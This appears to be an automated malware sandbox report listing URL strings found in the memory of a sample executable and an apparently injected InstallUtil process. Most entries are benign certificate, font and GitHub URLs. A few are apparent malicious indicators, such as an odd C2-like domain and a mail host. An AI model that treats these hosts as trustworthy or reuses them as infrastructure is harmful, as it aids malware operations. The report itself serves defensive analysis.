                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE03C000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE07E000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119ADFF0000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF652000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0M
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199458A000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F32000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F42000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995BC8000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119949E1000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994404000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997C5F000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997DE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A760000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199ACE2000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119989C4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119993F3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011999FD3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.pki.goog/gts1p5/0jT46UX4DmY.crl0
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2436168207.00000119AC5FA000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2436168207.00000119AC5FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enG
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997B83000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119948D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://heygirlisheeverythingyouwantedinaman.com:443
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993FB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://heygirlisheeverythingyouwantedinaman.com:443/
                    Source: InstallUtil.exe, 00000005.00000002.2959651140.0000000003346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.bananasnevis.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE03C000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr10)
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE07E000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119ADFF0000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF652000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF6C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/s/gts1p5/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199458A000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F32000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F42000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995BC8000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119949E1000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994404000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997C5F000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997DE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A760000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199ACE2000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119989C4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119993F3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011999FD3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/s/gts1p5/uFgUyufpvHQ01
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE03C000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998B4C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199458A000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F32000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997146000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997F42000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995BC8000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119949E1000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994404000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997C5F000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997DE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A760000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199ACE2000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119989C4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994173000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995FE4000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119993F3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011999FD3000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996E63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gts1p5.der0_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF704000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF779000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE07E000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF7E2000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199AC2C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF686000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119ADFF0000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF652000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2458807813.00000119AF69A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                    Source: InstallUtil.exe, 00000005.00000002.2985158869.00000000067B0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2959651140.0000000003346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0b
                    Source: InstallUtil.exe, 00000005.00000002.2985158869.00000000067B0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2959651140.0000000003346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/SoftwareSourceCode
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993C41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119989D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.olfeo.com/sites/olfeo/files/foundation_logo.png
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011996D52000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998947000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011998792000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199873C000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994E13000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119989ED000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A40E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.freecsstemplates.org
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.000001199A40E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.squid-cache.org/Artwork/SN.png
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994123000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011997D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2442487415.00000119AD8F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: InstallUtil.exe, 00000005.00000002.2985158869.00000000067B0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2959651140.0000000003346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: InstallUtil.exe, 00000005.00000002.2985158869.00000000067B0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2959651140.0000000003346000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A51F0000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2951796876.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119948D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/errors
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/_private/browser/stats
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.githubusercontent.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119948D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994F55000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.12.1/themes/flick/jquery-ui.min.css
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011994421000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.github.com/github/collect
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://desktop.github.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/articles/about-issue-and-pull-request-templates
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/github/creating-cloning-and-archiving-repositories/creating-a-repository-on-
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/search-github/github-code-search/understanding-github-code-search-syntax
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/site-policy/github-terms/github-terms-of-service
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.github.com/site-policy/privacy-policies/github-privacy-statement
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://education.github.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.00000119948D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Ubuntu:400
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github-cloud.s3.amazonaws.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.blog
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011993C41000.00000004.00000800.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List.git
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt&quot;
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/blob/master/http.txt?raw=true
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/TheSpeedX/PROXY-List/raw/master/http.txt
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/notifications/beta/shelf
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A3CE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
